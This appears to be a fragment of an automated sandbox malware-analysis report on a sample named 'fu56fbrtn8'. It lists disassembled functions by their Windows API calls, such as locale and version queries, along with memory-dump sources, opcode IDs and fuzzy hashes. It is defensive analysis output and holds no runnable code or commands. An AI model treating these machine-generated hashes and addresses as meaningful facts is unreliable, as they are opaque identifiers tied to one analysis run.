• Instruction Fuzzy Hash: 60F0F6767007055FD7245F39CC80B6ABB96FF80378B15896CE9878BA40D7B2A842C690
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 156C5888: EnterCriticalSection.KERNEL32(?,?,156C2FDB,00000000,156EE928,0000000C,156C2F96,?,?,?,156C5B26,?,?,156C82CA,00000001,00000364), ref: 156C5897
• EnumSystemLocalesW.KERNEL32(156C83BE,00000001,156EEAD0,0000000C), ref: 156C843C
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: f1f6b7491f118544f4ec5882266366b645192c64295fb2ca16f92c2ba56b5337
• Instruction ID: 81556d846eeb7f87cc6c374a0437dbab93ee2c42d51cd00988330cf29a6700f1
• Opcode Fuzzy Hash: f1f6b7491f118544f4ec5882266366b645192c64295fb2ca16f92c2ba56b5337
• Instruction Fuzzy Hash: 79F04F7AA61218EFD710DF68C895B9D77E5FB04321F10859AE410DB290CF756940CFD9
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
  • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
  • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
  • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
• EnumSystemLocalesW.KERNEL32(156D1EA7,00000001,?,?,?,156D2712,156C4A6C,?,?,?,?,?,156C4A6C,?,?,?), ref: 156D1F87
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: df707e7511f53b1ccbbd2df6c09351faff82c7441997c1c365b688ad4f0b0ba7
• Instruction ID: e2c8826b71a8636f3cd6fbb131205ca51edaeedeba134b5ff3803017bcc1786d
• Opcode Fuzzy Hash: df707e7511f53b1ccbbd2df6c09351faff82c7441997c1c365b688ad4f0b0ba7
• Instruction Fuzzy Hash: 6FF0E53AB4034A97C7149F35C858E6AFF95FFC2724B064898EA458BA40C776E942C7E0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DEA79E
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
• Instruction ID: feeb8c3de5cae5ee239750e2d657230c7d787c04f08c46386d0bee28130c61d8
• Opcode Fuzzy Hash: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
• Instruction Fuzzy Hash: A9E0D87170021817DB11F5595C819FA726DEB5C710F00417FBD5AC7341EEA0DD408AF4
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExA.KERNEL32(?,02E0A106,00000000,02E0A11E), ref: 02DEB756
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Version
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                    • Opcode ID: 3a65f5eb91bcad8ef286a16987bf4636baf3d6d297023bf91f128577605e7fef
                                                                                                                                                    • Instruction ID: 40b68365c7edb812432e059abd085853fc0ac8df9f4b250838caf01f43e33043
                                                                                                                                                    • Opcode Fuzzy Hash: 3a65f5eb91bcad8ef286a16987bf4636baf3d6d297023bf91f128577605e7fef
                                                                                                                                                    • Instruction Fuzzy Hash: 0CF017749843018FC750EF29D48161577E1FB48718F888E2DE899C7384D735E895CFA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02DEBE2E,00000000,02DEC047,?,?,00000000,00000000), ref: 02DEA7DF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                    • Opcode ID: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                                                    • Instruction ID: 14cf6e0960d4500240eadd69093960ddc5c694d25ddfe685fbaf8b26c6812047
                                                                                                                                                    • Opcode Fuzzy Hash: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                                                    • Instruction Fuzzy Hash: BDD05EAA30E2A03AA620B15A2D85DBB5AECCAC57B1F00447EB989C6301D200CC06D6B1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                    • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                                    • Instruction ID: 94c07274dfd8283b2d52fd4e22a8d47389a1233fcfa7e554bf900c00df5c9c04
                                                                                                                                                    • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                                    • Instruction Fuzzy Hash: 0F512771B096896FDF3089A48D51BAE739ABB12240F20091AD883CFA81C5F5FD05C3D6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                    • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                                    • Instruction ID: 460f9d119aa2c6608d62a06666177dff4c0f5b14d0edfb8a220737c7d6ddfe22
                                                                                                                                                    • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                                    • Instruction Fuzzy Hash: 77511871B1C6459BDB2089648950BAE67BEBB32200F004519D547CFF91C6F6F916C3DB
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: efd04ce2a1c17dc7bfe41e130590877257451f4c57a066e363061a95a2643ee6
                                                                                                                                                    • Instruction ID: 8fe9d83272ed4775e98b2d3fe7dbfc4f040681e390b999c95416e0dcf883b3f4
                                                                                                                                                    • Opcode Fuzzy Hash: efd04ce2a1c17dc7bfe41e130590877257451f4c57a066e363061a95a2643ee6
                                                                                                                                                    • Instruction Fuzzy Hash: 20322631D29F514DD7239534C8A2335A29DEFB72D4F15D72BE826B5E95EF28C4838180
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 27925b6721cd244bdc21143d6bf8a631f74da6fed394caaad021ae31fa6508b1
                                                                                                                                                    • Instruction ID: 0aded9a53a57d5d6002978c9f9dc24f3819b461dea92424cf6f89d213b848152
                                                                                                                                                    • Opcode Fuzzy Hash: 27925b6721cd244bdc21143d6bf8a631f74da6fed394caaad021ae31fa6508b1
                                                                                                                                                    • Instruction Fuzzy Hash: A032E83DD08B81CFEBA1DB38808A417F7D8EF6172435159CDDA934294897299D2ACF87
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 80a43d6613d2cc44a87a2a7b42b24337b7313d3f5d9f36f695e048a997dbb0e1
                                                                                                                                                    • Instruction ID: d06e3a76567597484400401e7bb91409f8c4ec083c5f27c528f818905cdc5b6c
                                                                                                                                                    • Opcode Fuzzy Hash: 80a43d6613d2cc44a87a2a7b42b24337b7313d3f5d9f36f695e048a997dbb0e1
                                                                                                                                                    • Instruction Fuzzy Hash: 4832D431A097869FD74ACF28C480B6AF7E5BF84314F050A2DF8A58B291D771E945CBC6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: eda7052e20b530288dff689475e1215f235710ffabc6898512a0157b343a587b
                                                                                                                                                    • Instruction ID: 0652273ef34aa609fa36b5c7025d07ae3d81fdc2939eac6f37300bccf3587033
                                                                                                                                                    • Opcode Fuzzy Hash: eda7052e20b530288dff689475e1215f235710ffabc6898512a0157b343a587b
                                                                                                                                                    • Instruction Fuzzy Hash: EB12B539D18B41CFEBA1DB798089546F7E0EF6172439198CDD5A742D0893389D2B8F87
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
• String ID:
• API String ID:
• Opcode ID: e0444d53bf58fec81d7d08260bcaa4e442e4aafa10957aac69d81864b1b8d134
• Instruction ID: 08ea533f27c713d920f5f1b075bd725b6c715fd689093e94607ce19c9e9981db
• Opcode Fuzzy Hash: e0444d53bf58fec81d7d08260bcaa4e442e4aafa10957aac69d81864b1b8d134
• Instruction Fuzzy Hash: 53D1143DD09B84CBBB61F9B8404B127BA90EF257147602DCEC577624807B989C6B8FC6
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b22337b3cc37a66b857be3e49a7b69177ab9ddeab596e76c959d90021641d145
• Instruction ID: 559ea3dd2c1c2958dbe99236a484d4f73af53badf43184175e998e8d62b8656e
• Opcode Fuzzy Hash: b22337b3cc37a66b857be3e49a7b69177ab9ddeab596e76c959d90021641d145
• Instruction Fuzzy Hash: 9B02A0B17246659BC318CF2ED89053AB7E1FB89301705856EE486D7781DB38E926CBD0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2bf51383338b9954006a8d78d40cba9a9f8383d76ca53bc17625f042b8d3af5f
• Instruction ID: d10b7025d4dee6b13ca3820eb53f57daf2f1cd29c414ce628950936a634e7d87
• Opcode Fuzzy Hash: 2bf51383338b9954006a8d78d40cba9a9f8383d76ca53bc17625f042b8d3af5f
• Instruction Fuzzy Hash: D4C1E33ED09B90C7BB61E9B8404B522BAC8EF657107A42DC9CC77424807B099C6F8FD6
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bce7c539ea2a25de303db4d935189094a7bc839981d83f4fe1febfa0ef6e4b4e
• Instruction ID: 02aebe1712dba7f574f4b75373521be9fa0c4899b5ba45e8155c99c675a7418c
• Opcode Fuzzy Hash: bce7c539ea2a25de303db4d935189094a7bc839981d83f4fe1febfa0ef6e4b4e
• Instruction Fuzzy Hash: 19F16A756252699FC704CE19D4D187AB3E9FB89301B44095EF182D7282CB35EA1ACBE1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 060aa474a2bff4f457c92a8e0c64bfd1f24a48cf3089d4f98921a53541dec077
• Instruction ID: b09cd7b942f45cdb94d10704b1e1157d1b0ab221178fbfacb9a1648dbb1d686f
• Opcode Fuzzy Hash: 060aa474a2bff4f457c92a8e0c64bfd1f24a48cf3089d4f98921a53541dec077
• Instruction Fuzzy Hash: 76B1C539D25B80C77B61E9BC444B527B690EF6575077429C9C86F828816B388CAB8EC7
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction ID: 877e20cfe34b53a2dac389aa98d72b0b3af308e59d20b0ebfa082003a4bc4eaf
• Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction Fuzzy Hash: 37C18132B091D30ADB4D863D857493FBAA16E926B131A0B6DD8B3CF9C5FE64D124C760
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7633e4bc6fac09cffaac5ee22d360a1680436d6905ed4c47f06ffae9fc5f3c74
• Instruction ID: 904deb8e253cc525aed243fcd1f8ad7e090b41fdbe59fce851cd09e26372f34f
• Opcode Fuzzy Hash: 7633e4bc6fac09cffaac5ee22d360a1680436d6905ed4c47f06ffae9fc5f3c74
• Instruction Fuzzy Hash: B291CE3DE19F91CBE351B5B8808E643BBD0DE6A6143A46DCDC5A78380A63148D6F8FC5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction ID: afc5056a56bd0fc8d8226d1716c04f747d26e5155dc17dda15efa4d0aa420a2c
• Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction Fuzzy Hash: C8C16E32B091930EDB5D863DC53483FBAA16A926B131A076DD8B3CF9C5FE64D124C7A0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
• Instruction ID: 1f3f9c6aab0d13dbedd76c48086a963e0dcca8438ae8b84f650c600318c4050d
• Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
• Instruction Fuzzy Hash: EAC17E32B091930ADB4D863D857483FBBA16A926B130E176DD8B3CF9C5FE68D124D760
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction ID: 5f857e63e1b1e2dfa4b64c66fd78b3eaeea0913019e95e7330eaa56732a642c9
• Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction Fuzzy Hash: 4AC16132B091930ADB4D463D853483FBAA16A926B131F076DD8B3CF9D5FE58D164C7A0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d1eba1aae4ef8e79a59a5c7e9243fe513f61ed30961ba9d2203fb51320f5ba74
• Instruction ID: 02d17184817e36a7789c95b0ce36cef61a241486694c5a72494b515d60c3da01
• Opcode Fuzzy Hash: d1eba1aae4ef8e79a59a5c7e9243fe513f61ed30961ba9d2203fb51320f5ba74
• Instruction Fuzzy Hash: BA91D83DD0DB80CBAB61F978404B122B7D0EF697147546DCDC8A7A28406B998C6B8FC7
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d603ee1f1805836df4209ac0cfeee31a205b97ca3cfb06a16ee6992b65450a8c
• Instruction ID: 92b029fb50bcd075cb302707c83362117128520f1901890587afb20c2584190a
• Opcode Fuzzy Hash: d603ee1f1805836df4209ac0cfeee31a205b97ca3cfb06a16ee6992b65450a8c
• Instruction Fuzzy Hash: EA812539D29B81C7A7A1F9B8404B123BAC0DF263147A02DC9C867928456B598C7F8FC7
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7a4b4c3cbe04e9ec6f752407561c88f6e1001df477f41228b2f84a49d2305ce6
                                                                                                                                                    • Instruction ID: 84d095c6042b855106d5c3d80d415ffee99ea44fa5359bc2691f93ce42ff8a48
                                                                                                                                                    • Opcode Fuzzy Hash: 7a4b4c3cbe04e9ec6f752407561c88f6e1001df477f41228b2f84a49d2305ce6
                                                                                                                                                    • Instruction Fuzzy Hash: 8D612A76F446095FDA248964CC90BAE6399FB41200F40092AE543DBAD0F6F6FEC2C7D9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c784579427f65759beabc26b59ca529a52015808e9add21d42ef753f9b9f8d98
                                                                                                                                                    • Instruction ID: af3c19faf2f52a7859f1cb646a508a2b41b46ab256e10c21c3f037bf6f26d4f7
                                                                                                                                                    • Opcode Fuzzy Hash: c784579427f65759beabc26b59ca529a52015808e9add21d42ef753f9b9f8d98
                                                                                                                                                    • Instruction Fuzzy Hash: A8613B75B44705AEDB248A248C90BAE63D9FF41640F40471AEA47DBAC0D9F1FE41C3D6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_3_2be0000_fu56fbrtn8.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a8ae63e840b889f79d98c2be02cbe2a9346125a6dff968a847ae6a8ce8ecbdfd
                                                                                                                                                    • Instruction ID: 3d54a8e2f80daf505402e388a69bc3ead8e260571d114ffbe9eae64ca2615d5c
                                                                                                                                                    • Opcode Fuzzy Hash: a8ae63e840b889f79d98c2be02cbe2a9346125a6dff968a847ae6a8ce8ecbdfd
                                                                                                                                                    • Instruction Fuzzy Hash: 5051AD3ED09B81C7BB61E9B8404B222B688EF657107943DC9CD77424846B19AC2B8FD6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.1353909714.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
